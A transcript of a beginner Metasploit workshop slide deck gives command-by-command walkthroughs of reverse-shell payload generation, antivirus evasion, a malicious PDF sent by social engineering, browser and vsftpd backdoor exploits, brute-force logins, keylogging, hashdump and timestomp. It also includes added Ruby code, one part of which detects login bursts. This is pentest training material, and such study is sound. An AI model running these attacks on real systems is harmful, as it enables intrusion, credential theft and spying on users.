Dyslexia AI Workshop for Slideshare.pptxcallscotland1987
 
FSB Advising Checklist - Orientation 2024
FSB Advising Checklist - Orientation 2024FSB Advising Checklist - Orientation 2024
FSB Advising Checklist - Orientation 2024Elizabeth Walsh
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfAdmir Softic
 
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxBasic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxDenish Jangid
 
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptxSKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptxAmanpreet Kaur
 
How to Manage Global Discount in Odoo 17 POS
How to Manage Global Discount in Odoo 17 POSHow to Manage Global Discount in Odoo 17 POS
How to Manage Global Discount in Odoo 17 POSCeline George
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual  Proper...General Principles of Intellectual Property: Concepts of Intellectual  Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...Poonam Aher Patil
 
Unit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxUnit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxVishalSingh1417
 
Understanding Accommodations and Modifications
Understanding  Accommodations and ModificationsUnderstanding  Accommodations and Modifications
Understanding Accommodations and ModificationsMJDuyan
 
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxHMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxEsquimalt MFRC
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxAreebaZafar22
 
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdfUGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdfNirmal Dwivedi
 
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet  PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...Kodo Millet  PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...pradhanghanshyam7136
 
How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17Celine George
 
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...Nguyen Thanh Tu Collection
 
Vishram Singh - Textbook of Anatomy Upper Limb and Thorax.. Volume 1 (1).pdf
Vishram Singh - Textbook of Anatomy  Upper Limb and Thorax.. Volume 1 (1).pdfVishram Singh - Textbook of Anatomy  Upper Limb and Thorax.. Volume 1 (1).pdf
Vishram Singh - Textbook of Anatomy Upper Limb and Thorax.. Volume 1 (1).pdfssuserdda66b
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfagholdier
 
Making communications land - Are they received and understood as intended? we...
Making communications land - Are they received and understood as intended? we...Making communications land - Are they received and understood as intended? we...
Making communications land - Are they received and understood as intended? we...Association for Project Management
 
Single or Multiple melodic lines structure
Single or Multiple melodic lines structureSingle or Multiple melodic lines structure
Single or Multiple melodic lines structuredhanjurrannsibayan2
 

Recently uploaded (20)

Dyslexia AI Workshop for Slideshare.pptx
Dyslexia AI Workshop for Slideshare.pptxDyslexia AI Workshop for Slideshare.pptx
Dyslexia AI Workshop for Slideshare.pptx
 
Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024
 
FSB Advising Checklist - Orientation 2024
FSB Advising Checklist - Orientation 2024FSB Advising Checklist - Orientation 2024
FSB Advising Checklist - Orientation 2024
 

Metasploit Humla for Beginner

  • 1. By : Ajay Srivastava
  • 2. Please don’t expect ….
    - How to evade antiviruses (antivirus evasion)
    - How to do pivoting
    - How to do port forwarding
    - How to write your own metasploit module
  • 3. Disclaimer
    - All the information or techniques you will be learning here are for educational purposes and should not be used for malicious activities.
  • 4. Agenda
    - Introduction
    - Basics of Metasploit
    - Information gathering
    - Exploitation
    - (11:30-11:45 - Break 1 / Tea)*
    - Meterpreter Basics
    - Post exploitation using meterpreter
    - Meterpreter scripts
    - (1:00 – 2:00 - Break 2 / Lunch)*
  • 5. Agenda
    - Metasploit utilities
    - Client-side exploitation
    - (4:00-4:20 – Break 3 / Tea)*
    - Auxiliary module
    - And we are done
    - * Lunch and Tea are self sponsored.
  • 6. Introduction
    - It’s not a Tool, it’s a Framework!!!
  • 7. History
    - Developed by H.D. Moore in 2003
    - Originally written in Perl & later on rewritten in Ruby
    - Acquired by Rapid7 in 2009
    - Remains open source & free for use
  • 9. Libraries
    - Rex:
      - The basic library for most tasks
      - Handles sockets and protocols
    - MSF CORE:
      - Defines the Metasploit Framework
      - Provides the ‘basic’ API
    - MSF BASE:
      - Provides the ‘friendly’ API
      - Provides simplified APIs for use in the Framework
  • 10. Modules
    - Exploit
      - Modules used for actually attacking the systems and grabbing access.
    - Payload
      - Piece of code which executes on the remote system after successful exploitation.
    - Auxiliary
      - Exploit without payload. Used for scanning, fuzzing & doing various tasks.
  • 11. Modules
    - Encoders
      - Program which encodes our payload to avoid antivirus detection
    - Nops
      - Used to keep payload size consistent
  • 12. Payloads
    - Single
      - Completely standalone
      - eg: Add user
    - Stagers
      - Creates the network connection
    - Stages
      - Downloaded by the stagers
      - eg: Meterpreter
  • 13. Payloads
    - Payload is staged if represented by ‘/’ in the payload name
    - windows/shell_bind_tcp
      - single payload with no stage
    - windows/shell/bind_tcp
      - a stager (bind_tcp)
      - a stage (shell)
  • 15. MSFCONSOLE
    - Most powerful interface among all interfaces
  • 18. Armitage
    - Graphical version of Metasploit
    - Developed by Raphael Mudge
    - Supports both GUI & CLI
  • 20. Basic Commands
    - #msfconsole
    - #msfupdate
    - MSFConsole commands are classified in two types:
      - Core Commands
      - Database commands
  • 21. Core Commands
    - help or ?
    - banner
    - version
    - show
    - search
      - msf> search <module name>
    - info
      - msf> info <module name>
    - use
      - msf> use <exploit/auxiliary name>
  • 22. Core Commands
    - back
    - show options
    - set
      - msf> set <option> <value>
    - setg
      - msf> setg <option> <value>
    - unset
      - msf> unset <option>
    - unsetg
      - msf> unsetg <option>
  • 23. Core Commands
    - show payloads
    - set payload
      - msf> set payload <payload name>
    - check
    - exploit
    - run
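A small Ruby model of the set / setg / unset / unsetg precedence shown on slides 21–23, added here as an example; it is not Metasploit's own datastore code, which is more involved. The addresses in the walk-through are made up; the module names are the ones used later in the slides.

```ruby
# Simplified model of msfconsole option precedence (added example, not
# Metasploit's own code): "setg" writes a global datastore, "set" writes
# the current module's datastore, and a lookup prefers the module-local
# value before falling back to the global one.
class OptionStore
  def initialize
    @global = {}                                # values written with setg
    @modules = Hash.new { |h, k| h[k] = {} }    # per-module values from set
  end

  # setg <option> <value>: visible to every module unless shadowed locally
  def setg(name, value)
    @global[name.upcase] = value
  end

  # set <option> <value>: applies only to the module it was set in
  def set(mod, name, value)
    @modules[mod][name.upcase] = value
  end

  # unset <option>: drops the module-local value so the global shows through
  def unset(mod, name)
    @modules[mod].delete(name.upcase)
  end

  # unsetg <option>: drops the global value
  def unsetg(name)
    @global.delete(name.upcase)
  end

  # Resolution order "show options" would display: module value, then global
  def get(mod, name)
    key = name.upcase
    return @modules[mod][key] if @modules[mod].key?(key)
    @global[key]
  end
end

# Walk-through: setg LHOST once (slide 57 style), then per-module set/unset.
# 10.0.0.5 / 10.0.0.9 are constructed sample addresses.
def demo
  store = OptionStore.new
  store.setg("lhost", "10.0.0.5")                        # setg lhost <attacker ip>
  store.set("exploit/multi/handler", "lport", "443")     # set lport 443
  store.set("exploit/multi/handler", "lhost", "10.0.0.9") # local override
  before = store.get("exploit/multi/handler", "lhost")   # local wins: 10.0.0.9
  store.unset("exploit/multi/handler", "lhost")
  after  = store.get("exploit/multi/handler", "lhost")   # global again: 10.0.0.5
  other  = store.get("exploit/windows/fileformat/adobe_utilprintf", "lhost")
  store.unsetg("lhost")
  gone   = store.get("exploit/windows/fileformat/adobe_utilprintf", "lhost")
  { before: before, after: after, other: other, gone: gone }
end
```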
  • 24. Database Commands
    - Default database: PostgreSQL
    - Database.yml
      - /opt/metasploit/apps/pro/ui/config/database.yml
      - # cat database.yml
    - db_status
    - db_disconnect
  • 26. Database Commands
    - db_nmap
      - # db_nmap -sV -A -O <ip range>
    - hosts
      - # hosts -h
    - services
      - # services
  • 27. Database Commands
    - vulns
    - db_export
    - db_import
    - db_rebuild_cache
    - creds
    - db_load
    - db_unload
  • 28. Information Gathering
    - Auxiliary modules are the best!!!
    - Will cover in detail later
    - Using auxiliary/scanner/portscan/tcp
      - msf> use auxiliary/scanner/portscan/tcp
    - Or
      - nmap <switches> <ip address>
  • 29. Exploitation
    - To list available exploits:
      - msf> search <exploit name>
    - To select an exploit:
      - msf> use <exploit name>
    - To get information about the selected exploit
      - msf/exploitname> info
    - To check the options and set arguments
      - msf/exploitname> show options
    - To set the target host
      - msf/exploitname> set rhost <victim ip>
  • 30. Exploitation
    - To list payloads supported by the selected exploit
      - msf/exploitname> show payloads
    - To set the payload
      - msf/exploitname> set payload <payload name>
    - To set the attacker machine
      - msf/exploitname> set lhost <own ip>
    - To check if the target is vulnerable to the selected exploit
      - msf/exploitname> check
    - To launch the attack
      - msf/exploitname> exploit
  • 32. Meterpreter
    - Post exploitation module
    - Runs in the exploited process context
    - Runs in memory and doesn’t create any file on disk
    - Encrypted communication
    - Stable and extensible
  • 33. Meterpreter
    - Classification
      - Core commands
      - File system commands
      - System commands
      - User interface commands
      - Priv commands
      - Networking commands
  • 34. Meterpreter : Core commands
    - background
    - sessions
    - ps
    - migrate
    - bgrun/bglist/bgkill
    - resource
  • 35. Meterpreter : Core commands
    - run
      - meterpreter> run <script name>
    - channel
      - meterpreter> execute -f <program> -c
    - use
      - meterpreter> use <extension name>
  • 36. Meterpreter : File System Commands
    - pwd
    - cd
    - getlwd/getlcd
    - ls
    - cat/edit
    - download/upload
  • 37. Meterpreter : File System Commands
    - search
      - meterpreter> search -d <directory> -f *.<fileformat> -r
    - mkdir/rmdir
    - rm/rmdir
    - del
  • 38. Meterpreter : System Commands
    - sysinfo
    - getpid/getuid
    - shell
    - reboot
    - shutdown
    - ps
  • 39. Meterpreter : UI Commands
    - User interface & Webcam commands
    - idletime
    - keyscan_start
    - keyscan_dump
    - keyscan_stop
    - webcam_list
    - webcam_snap
  • 40. Meterpreter : Privs Commands
    - getsystem
    - hashdump
    - timestomp
      - timestomp -h
      - timestomp <filepath> -v (to display all attributes)
      - timestomp <filepath> -c <MM/DD/YYYY H:M:S>
  • 41. Meterpreter : Networking commands
    - arp
    - ipconfig/ifconfig
    - netstat
    - route
    - portfwd
  • 42. Meterpreter scripts
    - Path:
      - /usr/share/metasploit-framework/scripts/meterpreter
    - Or
      - meterpreter> run <tab multiple times>
  • 43. Meterpreter scripts
    - run <script name>
    - run checkvm
    - run credcollect
    - run keylogrecorder
    - run winenum
    - run getcountermeasure
    - run getgui
  • 44. Meterpreter scripts
    - run scraper
    - run hostedit
    - run gettelnet
    - run arpscanner
    - run vnc
    - run filecollector
      - meterpreter> run filecollector -d <dnm> -f *.txt -r
  • 46. Metasploit Utilities
    - Three main utilities to generate shellcode and to evade antiviruses
      - Msfpayload
      - Msfencode
      - Msfvenom
  • 47. Msfpayload
    - To generate a payload in different formats such as exe, C, Ruby and javascript
    - Using msfpayload:
      - root@kali:~# msfpayload -h
    - To check options
      - root@kali:~# msfpayload <payload name> O
      - root@kali:~# msfpayload windows/meterpreter/reverse_tcp O
    - Setting the options
      - root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 X > exploit.exe
    - Sending this exploit.exe to the victim
  • 48. Using Multi-handler Exploit / setting listener
    - Setup listener:
      - msf > search multi/handler
      - msf > use exploit/multi/handler
      - msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
      - msf exploit(handler) > show options
      - msf exploit(handler) > set lhost <attacker ip>
      - msf exploit(handler) > set lport 4422
      - msf exploit(handler) > exploit
  • 49. MSFEncode
    - To bypass antiviruses
    - Alters the code by converting it into a binary EXE. When it connects back, it decodes the payload and executes it in memory.
    - Payload is encoded by different encoders
  • 50. MSFEncode
    - root@kali:~# msfencode -h
    - Usage: /opt/metasploit/apps/pro/msf3/msfencode <options>
    - OPTIONS:
      - -e <opt> The encoder to use
      - -c <opt> The number of times to encode the data
      - -t <opt> The output format: bash,c,java,perl,pl,py,python,raw,sh,vbscript,asp,aspx,exe
      - -x <opt> Specify an alternate executable template
      - -k Keep template working; run payload in new thread (use with -x)
  • 51. MSFEncode
    - list encoders:
      - root@kali:~# msfencode -l
    - msfencode with msfpayload:
      - root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 R | msfencode -e x86/shikata_ga_nai -c 8 -t exe > /var/www/exploitbypass.exe
  • 52. Client-side Attacks
    - Difficult to find server-side vulnerabilities
    - Most enterprises have incoming connections locked down with firewalls
    - Client-side attacks are the most common ones:
      - Browser based attacks
      - Social engineering attacks using a malicious link or file
  • 53. Client-side Attacks : Browser based
    - Using the IE 6 based Aurora exploit
      - msf > search aurora
      - msf > use exploit/windows/browser/ms10_002_aurora
      - msf exploit(ms10_002_aurora) > show options
      - msf exploit(ms10_002_aurora) > set srvhost <attacker ip>
      - msf exploit(ms10_002_aurora) > set srvport 80
      - msf exploit(ms10_002_aurora) > set uripath /test
  • 54. Client-side Attacks : Browser based
      - msf exploit(ms10_002_aurora) > show options
      - msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
      - msf exploit(ms10_002_aurora) > show options
      - msf exploit(ms10_002_aurora) > set lhost <own ip>
      - msf exploit(ms10_002_aurora) > set lport 443
      - msf exploit(ms10_002_aurora) > exploit
  • 55. Client-side Attacks : File Format
    - Nowadays file format based exploits are exploiting targets in the wild.
    - File formats such as pdf, doc or rtf are sent as an attachment to the victim, who is expected to open it.
    - For eg:
      - Adobe util.printf() Buffer overflow vulnerability
      - MS14-017 Microsoft Word RTF Object Confusion
  • 56. Client-side Attacks : File Format
    - Exploiting the Adobe util.printf() Buffer overflow vulnerability
      - msf > search adobe_utilprintf
      - msf > use exploit/windows/fileformat/adobe_utilprintf
      - msf exploit(adobe_utilprintf) > set filename resume.pdf
      - msf exploit(adobe_utilprintf) > show options
      - msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
  • 57. Client-side Attacks : File Format
      - msf exploit(adobe_utilprintf) > setg lhost <attacker ip>
      - msf exploit(adobe_utilprintf) > set lport 443
      - msf exploit(adobe_utilprintf) > exploit
    - Setup listener (i.e. multi/handler)
    - Send this resume.pdf using some social engineering techniques.
  • 58. Client-side Attacks : File Format
    - Setting up listener on local machine:
      - msf > search multi/handler
      - msf > use exploit/multi/handler
      - msf exploit(handler) > show options
      - msf exploit(handler) > set lhost <own ip>
      - msf exploit(handler) > set lport 443
      - msf exploit(handler) > exploit
  • 60. Auxiliary Modules
    - Pre-exploitation module
    - Port scanners, fuzzers, banner grabbers, brute-force modules etc.
    - Path:
      - /usr/share/metasploit-framework/modules/auxiliary
    - or using show auxiliary on msfconsole:
      - msf > show auxiliary
    - Used without payloads
  • 61. Auxiliary Modules
    - Used the same as exploits but without a payload
      - msf> use <auxiliary name>
    - ‘run’ command instead of ‘exploit’ command
    - RHOSTS instead of RHOST
  • 62. Auxiliary Modules : Port scanners
    - Portscan auxiliary modules are used for port scanning
    - Using portscanners:
      - msf > search portscan
      - msf > use auxiliary/scanner/portscan/tcp
      - msf auxiliary(tcp) > show options
      - msf auxiliary(tcp) > set rhosts <target>
      - msf auxiliary(tcp) > set ports 1-100
      - msf auxiliary(tcp) > set threads 10
      - msf auxiliary(tcp) > run
  • 63. Auxiliary Modules : SMB version fingerprinting
      - msf > search smb_version
      - msf > use auxiliary/scanner/smb/smb_version
      - msf auxiliary(smb_version) > show options
      - msf auxiliary(smb_version) > set rhosts 192.168.37.0/24
      - msf auxiliary(smb_version) > set threads 10
      - msf auxiliary(smb_version) > run
  • 64. Auxiliary Modules : Version Scanner
    - Banner grabbing of MySQL server:
      - msf > search MySQL
      - msf > use auxiliary/scanner/mysql/mysql_version
      - msf auxiliary(mysql_version) > show options
      - msf auxiliary(mysql_version) > set rhosts <target>
      - msf auxiliary(mysql_version) > run
  • 65. Auxiliary Modules : Login Scanners
    - Testing login attack on MySQL:
      - msf > use auxiliary/scanner/mysql/mysql_login
      - msf auxiliary(mysql_login) > show options
      - msf auxiliary(mysql_login) > setg rhosts <target>
      - msf auxiliary(mysql_login) > set user_file userfile.txt
  • 66. Auxiliary Modules : Login Scanners
      - msf auxiliary(mysql_login) > set pass_file passfile.txt
      - msf auxiliary(mysql_login) > set stop_on_success true
      - msf auxiliary(mysql_login) > run
  • 67. Auxiliary Modules : Telnet
      - msf > search telnet_login
      - msf > use auxiliary/scanner/telnet/telnet_login
      - msf auxiliary(telnet_login) > show options
      - msf auxiliary(telnet_login) > setg rhosts <target ip>
      - msf auxiliary(telnet_login) > set user_file userfile.txt
  • 68. Auxiliary Modules : Telnet
      - msf auxiliary(telnet_login) > set pass_file passfile.txt
      - msf auxiliary(telnet_login) > set stop_on_success true
      - msf auxiliary(telnet_login) > run
    - Verify:
      - root@kali:~# telnet <target ip>
  • 69. Auxiliary Modules : Attacking FTP
      - msf > search ftp_version
      - msf > use auxiliary/scanner/ftp/ftp_version
      - msf auxiliary(ftp_version) > show options
      - msf auxiliary(ftp_version) > set rhosts <target>
      - msf auxiliary(ftp_version) > run
    - Result on metasploitable2: FTP Banner: '220 (vsFTPd 2.3.4)'
  • 70. Auxiliary Modules : Attacking FTP
    - Now checking for ftp login
      - msf > search ftp_login
      - msf > use auxiliary/scanner/ftp/ftp_login
      - msf auxiliary(ftp_login) > set rhosts <target ip>
      - msf auxiliary(ftp_login) > set user_file userfile.txt
      - msf auxiliary(ftp_login) > set pass_file passfile.txt
      - msf auxiliary(ftp_login) > set stop_on_success true
      - msf auxiliary(ftp_login) > run
    - Successful FTP login for 'msfadmin':'msfadmin'
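From the defender's side, the login scanners on slides 65–70 (user_file, pass_file, stop_on_success) leave a recognisable trace in the target's log: a burst of failed logins from one client, then a single success and silence. The Ruby below is an added example, not part of the slides or of Metasploit; the log lines are constructed in vsftpd's format with made-up addresses, and the threshold and window are arbitrary choices.

```ruby
# Detect the trace an ftp_login run with stop_on_success leaves in vsftpd's
# log: many FAIL LOGIN lines from one client in a short window, then one
# OK LOGIN. Added example (not Metasploit's code); the sample lines are
# constructed in vsftpd's log format and the addresses are made up.
require 'time'

SAMPLE_LOG = <<~LOG
  Tue May  7 10:00:01 2024 [pid 2101] [root] FAIL LOGIN: Client "192.168.37.50"
  Tue May  7 10:00:01 2024 [pid 2103] [admin] FAIL LOGIN: Client "192.168.37.50"
  Tue May  7 10:00:02 2024 [pid 2105] [ftp] FAIL LOGIN: Client "192.168.37.50"
  Tue May  7 10:00:02 2024 [pid 2107] [user] FAIL LOGIN: Client "192.168.37.50"
  Tue May  7 10:00:03 2024 [pid 2109] [msfadmin] FAIL LOGIN: Client "192.168.37.50"
  Tue May  7 10:00:03 2024 [pid 2111] [msfadmin] OK LOGIN: Client "192.168.37.50"
  Tue May  7 10:05:00 2024 [pid 2200] [alice] FAIL LOGIN: Client "192.168.37.20"
  Tue May  7 10:05:09 2024 [pid 2201] [alice] OK LOGIN: Client "192.168.37.20"
LOG

LINE_RE = /\A(?<ts>.+?) \[pid \d+\] \[(?<user>[^\]]*)\] (?<result>OK|FAIL) LOGIN: Client "(?<ip>[^"]+)"/

# Parse one log line into a hash; nil for lines that are not login events.
def parse_line(line)
  return nil unless (m = LINE_RE.match(line))
  # vsftpd pads the day with a space ("May  7"); squeeze before parsing
  { time: Time.strptime(m[:ts].squeeze(' '), '%a %b %d %H:%M:%S %Y'),
    user: m[:user], ok: m[:result] == 'OK', ip: m[:ip] }
end

# Flag every client with at least `threshold` failures inside `window`
# seconds, and report whether a success followed the burst (the
# stop_on_success signature: the scanner stops as soon as one pair works).
def detect_bursts(log, threshold: 5, window: 60)
  events = log.lines.map { |l| parse_line(l) }.compact
  events.group_by { |e| e[:ip] }.filter_map do |ip, evs|
    evs = evs.sort_by { |e| e[:time] }
    fails = evs.reject { |e| e[:ok] }
    next if fails.size < threshold
    # sliding window over the sorted failure timestamps
    burst = (0..fails.size - threshold).any? do |i|
      fails[i + threshold - 1][:time] - fails[i][:time] <= window
    end
    next unless burst
    last_fail = fails.last[:time]
    success = evs.find { |e| e[:ok] && e[:time] >= last_fail }
    { ip: ip, failures: fails.size,
      users_tried: fails.map { |e| e[:user] }.uniq.size,
      success_after_burst: success ? success[:user] : nil }
  end
end
```

A single mistyped password from 192.168.37.20 stays below the threshold, while the scanner's burst is reported together with the account that finally worked.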
  • 71. Auxiliary Modules : Attacking FTP
    - From the FTP version scan we know its version is vsFTPd 2.3.4
    - Now looking for an exploit for this FTP version
      - msf > search vsFTPd 2.3.4
      - msf > use exploit/unix/ftp/vsftpd_234_backdoor
      - msf exploit(vsftpd_234_backdoor) > show options
      - msf exploit(vsftpd_234_backdoor) > set rhost <target ip>
      - msf exploit(vsftpd_234_backdoor) > show payloads
      - msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
      - msf exploit(vsftpd_234_backdoor) > exploit
  • 73. References
    - Metasploit Guide, http://packetstormsecurity.com/files/119280
    - Securitytube Metasploit Framework Expert (SMFE course by Vivek Ramachandran)
    - Metasploit Unleashed, http://www.offensive-security.com/metasploit-unleashed/Main_Page